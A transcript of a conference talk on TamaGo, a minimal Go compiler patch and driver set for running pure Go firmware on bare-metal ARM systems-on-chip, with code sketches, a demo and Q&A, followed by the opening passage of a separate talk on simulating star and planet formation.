But Go doesn't have that chance yet, and that's what we want to give to Go, this chance, because we think it really can and we're going to see why. So in a nutshell, what we're going to try to achieve... because the other message of this talk is that it's important how you do it, not only what you do, because anybody can run Go, anybody can understand that with the right effort you can put Go on the bare metal, it's fine. But the problem is how you achieve that, because there's an element of trust there. And we're going to get to that. So the idea of Tamago is that we want to find the path of least resistance in patching the Go compiler. So we want to find a patch which is absolutely minimal to cleanly enable support on the bare metal. So our take is to provide a different OS variable to Go. Normally in Go you have GOOS to specify whether you're under Windows, Linux or other operating systems. So we created a separate GOOS and a minimal patch to enable that on the ARM architecture, so that we can run the runtime on bare metal. So this is one part of Tamago. The second half is a set of packages that provide support for hardware boards, so the drivers, so to speak. Right now we have support for the USB armory system on chip, which is actually a widely used system on chip, so not just specific to the USB armory, which is a member of the NXP i.MX6 family, and we're going to target more platforms in the future. And our goal for doing this is, again, to develop security applications using the existing open source tooling that we have for signing secure boot images and so forth for the USB armory. So there have been similar Go efforts in the past, and there are similar Go efforts right now, but for a variety of reasons they all didn't quite fit what we needed to do. So we had two projects, mainly, which are now unmaintained. There was a project called Biscuit which wanted to actually create an OS kernel in Go. So the idea there wasn't just to support Go applications but to support any application written in any language, with POSIX compliant interfaces and so forth. This is unmaintained. There's a lot of complexity to the project, because they would do memory allocation and threading and so forth, and they hijacked the existing GOOS=linux support despite not actually running on Linux. So for these reasons it wasn't exactly what we were looking for. There's another project, also unmaintained, which is called GERT, which is an ARM adaptation of Biscuit for running actually only Go applications; again it hijacks GOOS=linux and has more complexity to it than what we want. So that's also something that is not suited for what we wanted. There's another nice project called Atman OS, which was presented I think three years ago, which is kind of similar to Tamago. However, it targets the Xen hypervisor and has limited runtime support, which is also something that we don't want. Now of course, if you like Go, if you know a little bit about the ecosystem, you of course might know about TinyGo, which is active and rocking. It's a great project. However, for our purpose, TinyGo is not quite what we wanted, because it's a completely different re-implementation of the Go compiler. So it's a different compiler, not the original one, and because it targets microcontrollers and not system on chips, it provides a different runtime with more limited language support. So it's not quite like vanilla Go. So it has a different focus. And then, brand new, actually published a few days ago:
We have Embedded Go, which is kind of a new project which also targets microcontrollers and the ARM Thumb architecture. So it actually adds new compiler support for it, because ARMv7-M is not native to Go. So it adds a 'noos' GOOS for the Thumb architecture. So again, it does something a little bit different than what we do, but it's actually quite an interesting project, so we're going to keep a close eye on that. So all of these projects, despite whether they are maintained or not, or whether they are complex or not, and whether they do what we like or not, they really helped us in proving that this can happen. So throughout our project, our approach to it is not that we needed to understand if this was possible. We just needed to understand if this was possible without polluting the compiler, if it was possible to do cleanly enough. And all of these projects just gave us the assurance that this can be done. So we're really grateful to all of the people that put their effort into these projects. So I work in information security, so to us, and for me at least, this is entering a territory which is all about compilers and languages and so forth. So it's really a new domain for us, but we want to bring over our core principles, which is enabling trust. And we see that there are a lot of projects, most unikernel projects, that are something that you would never see in production; really nice, like from a technical perspective, they're really people that do something they believe in, they have passion and they push the boundaries of technology. But are you going to find those in production? Well, not so much. So we want something that is done in a minimal, clean and trusted way, that is good enough to be eventually accepted upstream, because that's our final goal. So we really wanted to find out if we can patch the original compiler in a very minimal way, and much of the effort has been placed in that. We didn't want to pollute the Go runtime to levels which we, as security people, think are unacceptable. Less is more. That was the motto of our effort. We want to have the least number of modifications, still readable of course, modifications that make sense and match the existing style and structure of the way the Go development team is working, because this also leads to code which is more verifiable and more maintainable in the future. So we designed it for a hypothetical upstream inclusion in the future. So we're working toward that, and we have a commitment to always track the latest Go release. In the end, we ended up with about 3,000 lines of code of compiler changes, and that's it, in order to support the runtime and enable the additional GOOS target. We placed strong emphasis on reusing code which was already there within the Go compiler framework, and the final goal is for developers to be able to use this just by having one import in their code, and that's it. If you don't need to use the hardware, you don't need to know about the hardware. And we want to support unencumbered Go applications, like no limitations, ideally zero limitations in the end. And also, the compiler is only half the story. We provide drivers so you can actually run this on hardware, which these days is relevant. And by using the original Go compiler, we inherit nice properties such as the Go compiler being self-hosted, it can compile itself, and having reproducible builds; these are all nice things that we do want when creating our firmware code.
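To give an idea of what "one import and that's it" is meant to look like in practice, here is a minimal sketch of a Tamago application. The board package import path below is only a placeholder (the real path is defined by the project and may change), and everything else happens through the standard library.

// Minimal sketch of a bare metal Go application: plain Go, with a single
// import of the board support package for its side effects (hardware
// initialization, console, timers). The import path is illustrative only.
package main

import (
	"fmt"

	_ "github.com/f-secure-foundry/tamago/usbarmory/mark-two" // placeholder path, check the project README
)

func main() {
	// fmt output ends up on the board's serial console through the
	// runtime's console hook described later; there is no OS underneath.
	fmt.Println("Hello from bare metal Go")
}

Building it means selecting the new target with the patched toolchain, along the lines of GOOS=tamago GOARCH=arm go build, plus linker flags that set the board's memory layout; the exact invocation is the project's, so treat this one as an approximation.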
So we have three different categories of Go compiler modifications that we've done. We have what we call glue code, which is merely code that just adds the Tamago keyword to source code that needs to be compiled. So this code has no logic, it's very benign, it's just stubs and definitions where we say there's a new architecture and it's named Tamago, and so we update all of the lists which are required to enable this support. So this is about 350 lines of code across many files. So we change many files, but the changes are really, really tiny and really, they have no impact whatsoever on the stability or security of the code. Then we have a second set of changes, which is the bulk of it, about 2,700 lines of code, which is reusing existing code within the Go runtime for execution on the bare metal. So I'll give you an example, and this is what I call the Go Frankenstein, because it was like creating a Frankenstein monster, but it's much better than what it sounds. It's not exactly a Frankenstein, it actually works. So, memory allocation: a lot of projects that try to put the Go runtime on the bare metal completely reimplemented memory allocation and threading, and we just saw that there's the memory allocation for Plan 9, which is included in the Go runtime and maintained, and with one line changed we can use that to run on the bare metal, because at some point the Plan 9 memory allocator just uses the brk syscall to allocate memory, but we're running on bare metal. We have our memory space, so we can just allocate pointers from it, and so with one line of change we can use all of that code which is right there, tested and maintained. For locking, structures and so forth, there's locking code within Go which is primarily for WebAssembly, and we can reuse it identically, and the nice thing about this code is that it has three functions which hook into the external OS, and we're going to use those to implement proper timer support. The nice thing is that we can keep a clean separation between what we need to do to run things on the bare metal and what Go already has within its code, and it's nice to do that rather than just hacking and changing Go code. It's nice to have nice entry points for doing things which touch the hardware a little more. And then we have an in-memory file system for now, but this is going to change soon in the next month, because we're going to add MMC and FAT support, which is actually quite easy to do; but there's an in-memory file system for NaCl which we just copy over. We enable it for Tamago and it works. This is actually the bulk. This is where the highest number of lines of code changed, because of the way the compiler works we just need to copy the mem_plan9.go file into mem_tamago.go in order to use that code. And then we have new code, which is about 600 lines of code in 12 files, which is Tamago-specific functionality, and it mainly provides initialization of the ARM core, so this is all code which is fairly standard, you will find it in any OS, any bootloader and so forth. And then we have code which provides hooks with your application and the board package to understand how big the memory is and what's the offset of the memory and so forth.
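To picture the memory allocation trick, the Plan 9 allocator asking for memory via brk and being answered on the bare metal from a fixed RAM region, here is a conceptual sketch outside the runtime. It is not the actual Tamago patch; the addresses and sizes are made-up placeholders.

// Conceptual sketch: a brk-style bump allocator over a fixed RAM region,
// which is roughly what answering the Plan 9 allocator on bare metal means.
// Addresses are hypothetical, not a real board's memory map.
package main

import "fmt"

const (
	ramStart = 0x80000000 // hypothetical start of usable RAM
	ramSize  = 512 << 20  // hypothetical 512 MB of RAM
)

var brk uintptr = ramStart // current end of the handed-out region

// sbrk grows the managed region by n bytes and returns the old break,
// mimicking what the brk/sbrk system call would do under an OS.
func sbrk(n uintptr) (uintptr, bool) {
	if brk+n > ramStart+ramSize {
		return 0, false // out of physical memory
	}
	old := brk
	brk += n
	return old, true
}

func main() {
	if p, ok := sbrk(1 << 20); ok {
		fmt.Printf("handed out 1 MB at %#x\n", p)
	}
}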
So this is the extent of the modifications that we need to do to run Go on the bare metal, or at least to have a compiler which allows us to do that. This is the memory layout that we use: your Go application lives there in memory, we have a heap, a stack, an interrupt vector table and so forth, so all of this is pretty standard, and we use all the available RAM depending on the board that we have. So basically there are three components here. We have the support within the Go runtime itself; this is an example of what happens in the file os_tamago_arm.go, and we see that we have hooks, variables and functions which need to be defined externally by the application. We don't want to put information about all the different boards, all the different hardware and the hardware peripherals within the Go runtime, we don't want to pollute it with that. So we have one generic function for hardware initialization, we have a function for printing on the console, and we have a function for getting random data and one for getting ticks, which the runtime expects the external board package to provide. And the same goes for the RAM: where the memory starts, what's the offset and what's the size. The rest of the code in this file is just architecture related initialization, so not specific to a board but just ARM initialization and so forth. So this is part of the Go compiler modifications. Then we have the system on chip package, which is actually very simple, because the only thing it provides right now, in relation to the hooks with the runtime, is the variables for where the memory starts and the offset of the stack. And then we have the board package, which actually tells what the size of the RAM is, because the start of the memory is going to be the same for a specific system on chip, but if you have different boards you might have more RAM, so the actual size is specified in the board package. And so, for instance, here in the USB armory package we say, okay, when I want anything to be printed out on the console, the console for the USB armory is actually the second UART, the second serial port; that information belongs in the USB armory package. This allows us to have minimal modifications in the Go runtime, to have system-on-chip specific information in the system-on-chip related package, in this case the i.MX6UL package, and any information that's specific to the board in the board support package, in this case the USB armory. So this is the clean way of doing it. Another example here: we have a timer definition, so within the Go runtime at some point Go needs to get ticks, or to understand what the time is, and that's provided externally by the i.MX6 package, which provides support for the generic timers for the USB armory, because that's what the architecture provides, and we can also, of course, mix in assembly when it's required. This is something that already happens in Go, it's not something that we're doing only ourselves, it's common and accepted, and it's the most efficient way to deal with very low level aspects such as getting timer information. So all of this is initialization code which accounts for about 500 lines of code, so not so much, and again it follows existing patterns in the Go runtime.
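A minimal sketch of the split just described, with purely illustrative names: the runtime expects a handful of hooks (hardware init, console output, entropy, RAM geometry) and the SoC/board packages provide them.

```go
// Sketch of the board side of the hook pattern; names and values are
// illustrative, not the real os_tamago_arm.go / board package symbols.
package board

// Memory geometry the runtime expects from the board: where RAM starts and
// how big it is (placeholder values).
const (
	RAMStart uint32 = 0x80000000
	RAMSize  uint32 = 512 * 1024 * 1024
)

// HWInit performs the board specific initialization (clocks, console UART).
func HWInit() {
	// SoC specific register setup would go here.
}

// Printk is the console hook; on the USB armory it would push the byte out
// on the second UART (UART2), as described in the talk.
func Printk(c byte) {
	// write c to the UART transmit register via the SoC package
}

// GetRandomData fills b with entropy, e.g. from the SoC's TRNG driver.
func GetRandomData(b []byte) {
	for i := range b {
		b[i] = 0 // placeholder: a real board would use the hardware RNG
	}
}
```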
So this is another example. At some point, while we were developing, we saw that code was running slower than expected, and we were like, oh wait a minute, we need to change the clock speed, because this system on chip by default is clocked at about 400 MHz, and if you want to run it at full speed at 900 MHz you actually have to do it yourself; the bootloader doesn't do it, the bootloader always sets the default frequency. So we quickly coded, in Go, within our system on chip package, the function for setting the frequency, and this is what a driver looks like in Go. We have our functions for setting registers: here we set the PLL register, we set two bits to zero at this offset, it's kind of what you would find in C, but just by using Go we can wait for a value to become one, because we are waiting for the lock on the clock; here we are removing the bypass that we needed for changing the clock, we set a divisor and so forth. So you can write drivers in Go, and the interesting thing about using memory safe languages on the bare metal is that every time you need to do something which is not safe you have a specific keyword for that. In Go, like in other high level languages, you have the keyword unsafe, so if you want to scout and look for all of the potentially dangerous places in the code where you are doing something like pointer arithmetic, you can just grep for it, you can just search for unsafe and you are going to find all the occurrences where you are dereferencing or doing pointer arithmetic. You do need to do that for drivers, but at least it's very easy to identify those places within the code; that's also something which we thought was really nice about using a higher level language such as this one. Concerning syscalls, the Go runtime makes direct use of syscalls for a lot of functions, and this was our main concern: do we need to emulate about 50 system calls in order to have the runtime working? It turns out that only one is actually really needed, which is write, which is the one that eventually gets hooked to the printk function. So now we support the write syscall only for standard output and standard error, and we use that to print to the console, because that's the only thing that you actually need on bare metal; I mean, you are either writing to a file descriptor, which is handled in a different manner within the Go runtime with the file system, or you want to write to standard output, and on this class of devices you don't have a screen, you have a console, and that's what we do in the board package. And if anybody wants to do something different with that in the board package, which again is outside the compiler, you can define whatever printk method you want. So in the end this is what it looks like: normally you would have your Go runtime running in user space under a complex OS, the Go runtime would make system calls, and then the kernel space with its drivers would be able to serve them, talk to, for example, files and so forth.
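As a generic sketch of what such register pokes look like in Go (these helpers are illustrative, not the actual TamaGo driver code), note how every dangerous access goes through the unsafe package, which is what makes it easy to grep for:

```go
// Generic memory-mapped register helpers in the style described above.
package reg

import (
	"runtime"
	"unsafe"
)

// read returns the current value of a 32-bit memory mapped register.
func read(addr uint32) uint32 {
	return *(*uint32)(unsafe.Pointer(uintptr(addr)))
}

// write stores val into a 32-bit memory mapped register.
func write(addr uint32, val uint32) {
	*(*uint32)(unsafe.Pointer(uintptr(addr))) = val
}

// setN sets `size` bits starting at bit `pos` to val, a read-modify-write
// like the PLL divisor change mentioned in the talk.
func setN(addr uint32, pos, size int, val uint32) {
	mask := uint32((1<<size)-1) << pos
	r := read(addr) &^ mask
	write(addr, r|((val<<pos)&mask))
}

// wait spins until the given bit reads as expected, e.g. waiting for the
// PLL lock bit after changing the clock frequency.
func wait(addr uint32, pos int, expected uint32) {
	for (read(addr)>>pos)&1 != expected {
		runtime.Gosched() // let other goroutines run while we poll
	}
}
```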
With Tamago we live in a Go runtime process: your package is linked with the runtime, the system on chip and the board packages are also linked, and these are the ones that provide the driver support. Every time a system call is made by the Go runtime, which in this case is the write system call, it is just hooked to the actual driver support within the Go package, but we are all within Go, and we use the vanilla Go runtime with the exception of a few initialization and runtime support functions which are specific to Tamago, which are the ones that actually serve system calls and so forth. So this is the change, and again we're dramatically reducing not only the lines of code count, but we are completely eliminating C, because in this setup the only C is actually the bootloader, which goes away after boot (but anyway, we are also working on replacing that); there is no C involved at all, not a single line, in all of this. So how do you develop, build and run this thing? Well, in order to use it you write Go as you always did, and you just import the board package; that's the only thing that you need to do. If you are not using a driver specifically, that's the only thing you need to do. If you want to use a driver, like the random number generator or USB, then you also need to import that, as you would in Go, but to run basic operations that's the only thing that you need. So that's the first step. Then you compile with go build as usual, with the exception of a few flags to the linker, where we need to tell it, and this depends on the board, what the entry point is going to be and where the text segment of our application is going to be, but that's it. So we have GOOS=tamago, GOARM=7, GOARCH=arm and then we just use go build; TAMAGO here is a variable that points to the Go toolchain compiled with Tamago support. And then with the U-Boot bootloader you just load the resulting ELF. That's it, there's no intermediate bootloader needed, you just run this application as you would a kernel. So we implemented drivers, security oriented drivers, for our system on chip, to prove to ourselves that this can actually be used, and this was an important part of the process. The i.MX6ULL, which we use on the USB armory, has a few security peripherals that we needed to enable. The first one that we developed a driver for was the data co-processor, which is the element that allows you to do encryption and decryption and key derivation with a hardware unique key, which is fused within the chip at the first power up of the system on chip. It's fused, you cannot read it, you can only use it, and it's unique for each chip. So we wrote a driver for that; the driver takes about 240 lines of code, which is I think 10 times less than the Linux kernel module for this. And then if you load its package you can just invoke the derive key function and derive a key using the hardware, and it also detects whether you're secure booted or not. Also note, the nice thing is that we can use structures that we create in Go; they can be made C compatible with a little effort, so you can pass them to the actual hardware, to the memory where the data has been allocated. So we just allocate a structure here, and then we actually pass a pointer to the structure and it just works. Here at the bottom we're actually writing the address of our Go-allocated structure to the hardware register, and then the hardware will fetch the structure and do its work.
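The pattern of handing a Go-allocated, C-compatible structure to a peripheral might look roughly like this; the structure layout, register address and names are placeholders, not the real DCP driver.

```go
// Illustrative sketch of passing a Go-allocated, C-compatible structure to a
// peripheral by writing its address into a hardware register.
package dcp

import "unsafe"

// workPacket mirrors a hardware descriptor layout; fixed-size integer fields
// keep it C compatible.
type workPacket struct {
	control    uint32
	sourceAddr uint32
	destAddr   uint32
	length     uint32
}

// placeholder register address for the sketch
const cmdPtrReg = 0x02280000

// submit hands pkt to the peripheral. The caller must keep pkt referenced
// for as long as the hardware may access it, so the garbage collector does
// not free it.
func submit(pkt *workPacket) {
	addr := uint32(uintptr(unsafe.Pointer(pkt)))

	// Write the descriptor address to the peripheral's command register;
	// the hardware then fetches the structure from memory and does its work.
	*(*uint32)(unsafe.Pointer(uintptr(cmdPtrReg))) = addr
}
```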
We wrote the driver for the random number generator. There's a true random number generator within the system on chip which can be used for the very first boot, because this kind of hardware doesn't have a battery, there's no real time clock, so at the very first boot you don't have anything and you need an initial seed, and this is a good use for it. So we also wrote a 150-line driver for this, and we hooked it to the crypto/rand package of Go, so you just use Go normally and the random numbers, if you use crypto/rand, are going to come from this. Then I wrote a USB driver, which is something that makes you question your life choices. I tell you, you wonder where you are at that point in your life, when you're almost 40 years old and you're writing a USB driver. However, my only concern was reading and studying the reference manual; at least I wasn't dealing with C and memory and so forth. So actually Go really helped keeping me happy, because I could use goroutines, I could use channels, I could use mutexes whenever I wanted, so it was a delight. My only problem was actually understanding the reference manual. When developing drivers with Go there are only two aspects that you need to care about which are unusual for Go programmers, because they never have to deal with them. You need aligned structures in memory, because most hardware will refuse to load data from an unaligned pointer, so we created a type for that; and to keep the garbage collector happy you need to carry around the underlying buffer which allows us to do the buffer alignment. But again, those are the only concerns that you really need to take care of. And so we have a full driver. Also, for every driver that we write, every time we touch the hardware we put the page number and the name and the section of the reference manual in a comment, because trust me on that: by looking at code from the Linux kernel and other projects, there were so many quirks that if there had been just one comment pointing to the right page you could have saved yourself hours of learning. So if you want to learn about system on chip and driver development, we also put in all of the references that you need in order to understand what's going on, and I think that's something that's missing a lot in kernel modules these days. USB networking: once I had the USB driver, we implemented USB networking in two hours, that was easy. Half of the code is just defining the descriptors, and then we define two functions for transmitting and receiving Ethernet over USB packets, and we hook them to Google's netstack, which is a very nice full Go TCP/IP stack made by Google, and so we just pull that in. And now I'm going to show you the demo of all of this, if the demo gods have been kind to me. So on the left side I'm going to boot my USB armory with Tamago.
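Here is a generic sketch of the two driver concerns just mentioned, aligned buffers and keeping the underlying allocation referenced for the garbage collector; again this is illustrative, not the actual TamaGo code.

```go
// Sketch of an aligned DMA buffer that keeps its backing allocation alive.
package dma

import "unsafe"

// Buffer keeps the original allocation (buf) alive for the GC while exposing
// an aligned view (Data) that can be handed to the peripheral.
type Buffer struct {
	buf  []byte // underlying allocation, kept to satisfy the GC
	Data []byte // aligned slice used for DMA
}

// NewBuffer allocates size bytes whose start address is aligned to align
// (align must be a power of two).
func NewBuffer(size, align int) *Buffer {
	b := &Buffer{buf: make([]byte, size+align)}

	// Find the first offset inside buf whose address is align-aligned.
	addr := uintptr(unsafe.Pointer(&b.buf[0]))
	off := (align - int(addr)&(align-1)) & (align - 1)

	b.Data = b.buf[off : off+size]
	return b
}
```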
So this is Tamago running. What it did in these few seconds: the bootloader booted directly into Go, we ran a self test of the random number generator, we changed the clock speed, we said hello because we're polite, we launched seven goroutines, we derived a key, we read a file in memory, we slept for 100 milliseconds to make sure that the timer implementation is correct, we generated a few random numbers, we made a few ECDSA signatures, we signed a Bitcoin transaction, the goroutines completed, then we allocated about 1.5 gigabytes of memory just to check that garbage collection works, and now we are waiting for USB. So if I plug it into my other USB armory, I have a USB armory connected to the USB armory, it's very meta. So now the USB descriptor has been evaluated and we already see network traffic, so if I connect to my USB armory now: hello, this is a simple UDP echo server, I can ask for a random number, I can debug the memory, and I can also do this: I can stream Star Wars in ASCII. And if it's not as smooth as you think it should be, the problem is not the armory, it's actually Windows, which doesn't support the console very well. So, except for the boot part, except for the bootloader, everything you've seen here, USB, TCP/IP handling, streaming, everything, there's not a single line of C code involved; it is pure Go and a little assembly, and I think that this is pretty cool, I don't know about you. So, performance, and we'll see if the movie ends while we go: performance, as expected, the speed is the same compared to running the same Go application under Linux. This is an example of ECDSA signatures from the Go compiler test suite running under Linux on the same hardware and running under Tamago, and the times are actually identical, which is what it's supposed to be: either identical or even faster, because we have less overhead from the operating system doing context switching. There are a few limitations, very few, and we're working on them. First of all, on this hardware we're single threaded, so if you have a tight loop and you have functions in this tight loop which don't go back to the runtime, it's going to be stuck forever there. This is not unique to us, this is what Go does every time you have GOMAXPROCS set to one and you're single threaded, so this is expected and normal, and you can also avoid it: you can force an invocation of the scheduler in tight loops. But usually, if you have really tight loops that don't do anything, it's just because you're testing Tamago, not because you're actually doing real work. We have yet to implement file system support and storage, so we're going to do that. If you import a package that needs something which requires an OS, such as a terminal console and so forth, it's not going to work, but that's expected. You can link C code if you want, but why would you, after my talk, right? But you can if you want, as long as it's freestanding. There's no OS, there's no users, there's no signals, there's no environment variables: this is a feature, not a bug. So, with the exception of a few surprises, again, Go is surprisingly adept at running on bare metal, and now we're going to use this in the future to write the secure firmware that we want to write: HSMs, cryptocurrency wallets, authentication tokens, TrustZone secure monitors and much more. This is the baseline for developing secure applications on this kind of hardware. So again, we learned that we can reduce complexity, not just shift it around; we kill C
completely, at least in this very specific implementation. And again, it's all about enabling the choice of a language which didn't have much of a chance on the bare metal, but now we think it has, and in the next months we just want to build trust in this and maybe have it accepted upstream. So thanks to all these people that enabled us to do this project, and now I have two minutes for questions, I hope, just a couple of questions. Thank you so much. Thank you, Andrea. Perfect ending time, 13:37, so we still have 13 minutes for Q&A. If you want to ask questions we have three microphones, please line up; microphone three is actually equipped with an induction loop if you're using hearing aids. And I get a signal that we have questions from the Signal Angel in the very back, from the internet. Hello, I have two questions from the internet, from the IRC. The first one is: does the garbage collector somehow cause performance issues on bare metal? No, not in our experience, and also, when working on the bare metal, if you really want you can turn it off; I mean, that's something that Go always had, you can turn off the garbage collection if you want, and you can run it at very specific times, or if your application is short lived and has predictable memory allocation you can also decide not to run it at all. It really depends on what you're doing; in our experience, for the operations that we need to do, we never stumbled into problems, and its performance and behavior is pretty much the same that you would see with a normal Go application running under a normal OS. There's actually no difference, we're not changing its behavior. Okay, thank you. The next question, and the last question, is: is Tamago suitable for real time applications, and if so, how much? I think that by disabling the garbage collection, possibly it can be. I'm not a big fan of real time operating systems; in our work experience, every time somebody used a real time operating system they had so many bugs anyway that the real time part wasn't really working very well, and actually they really didn't need it. But of course there are some applications, financial applications, where you really need it; if you have the time and effort for that, Rust is probably a much better suited language. Having said that, I think there might be a chance that by turning garbage collection off this can also work, because in the end the result is very predictable if you turn garbage collection off. Next question from microphone number one, please. Thanks for the project, three small questions. First, do you usually look at the assembly which you have after compiling on your platform? Second, Go is very famous for fuzzing, do you have some fuzzing of your applications on your platform? And the last one, did you find any bugs in the Go runtime while porting to your platform? So yes, we look at the assembly, we also use the Go assembler ourselves; the generation is identical, again, to what you have with normal Go on x86, or sorry, with ARM, the difference is that it runs on the bare metal. The efficiency that you're going to get when compiling is the same, because we're not touching that, we're not touching the Go assembler, we just use it. The second question, fuzzing: we want to use this to fuzz USB, actually one of our projects is to implement a low level USB fuzzer with the USB armory that can fuzz the host; we're also trying to understand how we can integrate fuzzing of this externally with Go by using go-fuzz, but yes, it's something that we're thinking of. And the third one, did you find any
bugs in the Go runtime itself? Yes, in fact, if you look when you get the slides, just look at this slide, there's a fun Go bug in the bottom right corner about the garbage collection. So yeah, we found at least one; it's a weird property, but yeah, we found one. And we're working with the people that work on the Go compiler for a living, and they're being so supportive, so yeah. But it's not a stopper, I mean, we didn't find anything that was a showstopper for us. Thank you. Excellent, thank you. We have another question from the internet via our Signal Angel. Yes, there are three more questions. I think we have time for that. Okay, then we take, well, you get all three, but just one now, the easiest one. Okay: how suitable would Tamago be for writing code for other microcontrollers, for example 32-bit MCUs? So for microcontrollers just go with TinyGo, because the footprint of applications built with the standard Go compiler is pretty large, so TinyGo, which is a great project, has a very good reason to exist. So for microcontrollers, TinyGo; for systems on chip, Tamago. That's the separation. Next question, microphone three, please. Hello, thank you very much for the talk and for the work. So will you be supporting other targets as well, like the armory Mk I and Allwinner chips? Yes, so we plan to support the armory Mk I, and we also plan to support the Raspberry Pi Zero; we're actually working on that right now, because of course we don't want to just support our hardware. I think it's important to give other projects the chance to use this, and it's actually very easy to support other pieces of hardware, it's only a few days of work, so yes, definitely, and pull requests are welcome. Okay, back to the Signal Angel. All right, another question is, oh, I got it: can this be run on other Cortex-R class processors, or is it the same, use TinyGo? It can be executed on any system on chip that has ARM architecture support within the Go runtime, so I would say that it would be trivial to run it on any ARMv7 system on chip, and it should be very easily adaptable to other ones; again, the number of modifications required and the hardware initialization make it easy to port to other platforms. So as long as we're talking about systems on chip with a Cortex core, it should be fairly easy to do. Yeah, thank you for the question and for the answer. I have more questions: would Tamago also run on the USB armory Mk I? Yes, yes, definitely, so we're going to make sure that we provide that support soon enough. A very interested C-only developer asked on Twitter: what about debugging, breakpoints, register maps and register memory manipulation on the MCU using Tamago? GDB works beautifully, so we use GDB, we use breakpoints, we can stop anywhere we want, we see the code just like any other application, otherwise we would have gone insane, so yes, that works. Okay, next up microphone number two, please. You mentioned file system support. Yes. Are you using, I think you mentioned FAT, do you use, there's a pure Go implementation for this, sorry, I'm blank on the name of the project, I think it has a full FAT implementation. Can you speak up a bit, please? Oh yeah, that implementation, I think they're using a user space driver for FAT, right, that's all in Go. Yeah, a pure Go FAT implementation, they're already out there; there's another project that already has that and also has the MMC support, so we're going to try and get that and put it in, it should be a very trivial effort,
and I just mentioned FAT because it's an easy file system format, and usually on a bare metal system you just want to take a blob, write it, read it, you don't need fancy storage. Thanks. Microphone number one, please. Thanks for the talk. Have you talked to upstream about getting it into the mainline? Yes, we're working on that. We're very anxious about it because we want everything to be super clean, but it is our intention to give this the best possible chance, and we have contacts upstream, and this was coded from the very beginning with the intention to make things clean, nice and respectful of what's already there in the Go runtime; we didn't want to hijack things that are not meant to be hijacked, and that's our goal, because in the end I don't want to maintain the compiler part, I just want to maintain the drivers and everything else. So yeah, we're really trying hard to get this into a state where it has the best chance to be accepted upstream. Do you have a timeline? No, but I would hope by the end of next year. Would it still be called Tamago, and why is it called Tamago? So it probably won't be called Tamago. It is called Tamago because tamago means egg in Japanese, and you have Go, and Go lives on bare metal in its own shell, and so it's Tamago; and if you run it under QEMU, it's a Tamagotchi. Thank you. This is the only reason why we do these projects: we first come up with a name, and then we're like, oh, what can I do with that name? Yeah. Do we have any more questions from the internet? No, we do not. I think we have another question at microphone number one. How about displays? These days embedded systems often have some screens. Well, the USB armory has no screen, so it wasn't our focus right now. Having said that, there's no reason why you couldn't implement a video driver with this; maybe it won't be as performant as it could be, but if you're doing DMA right and you're clever enough, of course it can work. But for now it's not our focus; our focus now is having smarter smart cards, HSM tokens, authentication tokens. We have Bluetooth on the USB armory, we have USB; for now, if we really want a UI with the USB armory, we either have a mobile app or you do it through networking. But yes, maybe in the future, who knows. Are there any more questions? I guess not, well then, thank you. Thank you so much, thank you.
TamaGo is an Open Source operating environment framework which aims to allow deployment of firmware for embedded ARM devices by using 0% C and 100% Go code. The goal is to dramatically reduce the attack surface posed by complex OSes while allowing unencumbered Go applications. TamaGo is a compiler modification and driver set for ARM SoCs, which allows bare metal drivers and applications to be executed with pure Go code and minimal deviations from the standard Go runtime. The presentation explores the inspiration, challenges and implementation of TamaGo as well as providing sample applications that benefit from a pure Go bare metal environment. TamaGo allows a considerable reduction of embedded firmware attack surface, while maintaining the strength of Go runtime standard (and external) libraries. This enables the creation of HSMs, cryptocurrency stacks and many more applications without the requirement for complex OSes and libraries as dependencies.
10.5446/53196 (DOI)
I have to say I'm always deeply impressed by how much we have already learned about space, about the universe and about our place in the universe, our solar system. But the next speakers will explain to us how we can use computational methods to simulate the universe and actually grow planets. The speakers will be Anna Penzlin. She is a PhD student in computational astrophysics in Tübingen. And Caroline Kimmich, she is a physics master's student at Heidelberg University. And the talk is entitled, Grow Your Own Planet: How Simulations Help Us Understand the Universe. Thank you. So hi everyone. It's a cool animation, right? And the really cool thing is that there's actually physics going on there. So this object could really be out there in space, but was created on a computer. This is how a star is forming, how our solar system could have looked in the beginning. Thank you for being here and for being interested in how we make such an animation. Anna and I are researchers in astrophysics and we're concentrating on how planets form and evolve. She's doing her PhD in Tübingen and I'm doing my master's in Heidelberg. And in this talk, we want to show you a little bit of physics and how we can translate that in such a way that a computer can calculate it. So let's ask a question first. What is the universe? Or what's in the universe? Most of the universe is something we don't understand yet. It's dark matter and dark energy. And we don't know what it is yet. And that's everything we cannot see in this picture here. What we can see are stars and galaxies. And that's what we want to concentrate on in this talk. But if we can see it, why would we want to watch it on a computer? Well, everything in astronomy takes a long time. So each of these tiny specks you see here is a galaxy, just like ours. This is what the Milky Way looks like. And we're living in this tiny spot here. And as you all know, our Earth takes one year to orbit around the Sun. Now think about how long it takes for the Sun to orbit around the center of the galaxy. It's 400 million years. And even star formation takes 10 million years. We cannot wait 10 million years to watch how a star is forming, right? That's why we need computational methods, or simulations on a computer, to understand these processes. So when we look at the night sky, what do we see? Of course, we see stars and those beautiful nebulas. They are gas and dust, and all of these images are taken with the Hubble Space Telescope. So there's one image that doesn't belong in there. But it looks very similar, right? This gives us the idea that we can describe the gases in the universe as a fluid. It's really complicated to describe the gas by every single particle. We cannot track every single molecule in the gas that moves around; it's way easier to describe it as a fluid. So remember that for later, we will need it. But first, let's have a look at how a star forms. A star forms from a giant cloud of dust and gas. Everything moves in that cloud. So eventually, more dense regions occur, and they get even denser. And these clumps can eventually collapse to one star. So this is how a star forms. They collapse due to their own gravity. And in this process, a disk forms, and in this disk, planets can form. So why a disk? As I said, everything moves around in the cloud. So it's likely that the cloud has a little bit of an initial rotation. As it collapses, this rotation gets larger and faster. And now you can think of making a pizza.
So when you make a pizza and spin your dough on your finger, you get a flat disk, like the disk around a star. That's the same process, actually. In this disk, we have dust and gas. From this dust in the disk, the planet can form. But how do we get from tiny little dust particles to a big planet? Well, it somehow has to grow. And grow even further and compact until we have rocks. And even grow further until we reach planets. How does it grow? Well, that dust grows, we know that. At least that's what I observed when I took those images in my flat. Well, so dust can grow and grow even further and compact. But when you take two rocks, we're now at this stage, when you take two rocks and throw them together, you do not expect them to stick. You expect them to crash and crack into a thousand pieces. And yet we're standing on the proof that planets exist. How does this happen? It's not quite solved yet in research. So this is a process that is really hard to observe, because planets are very, very tiny compared to stars. And even stars are only small dots in the night sky. Also, as I said, planets form in a disk, and it's hard to look inside the disk. So this is why we need computation to understand how planets form, and other astronomical processes. So let's have a look at how we simulate it on a computer. Okay. So we have seen nature; it's beautiful, and just like a tank of water, we already have a bubbly fluid. So now we have this bubbly fluid demonstrated here in the middle. But now we have to teach our computer to deal with the bubbly 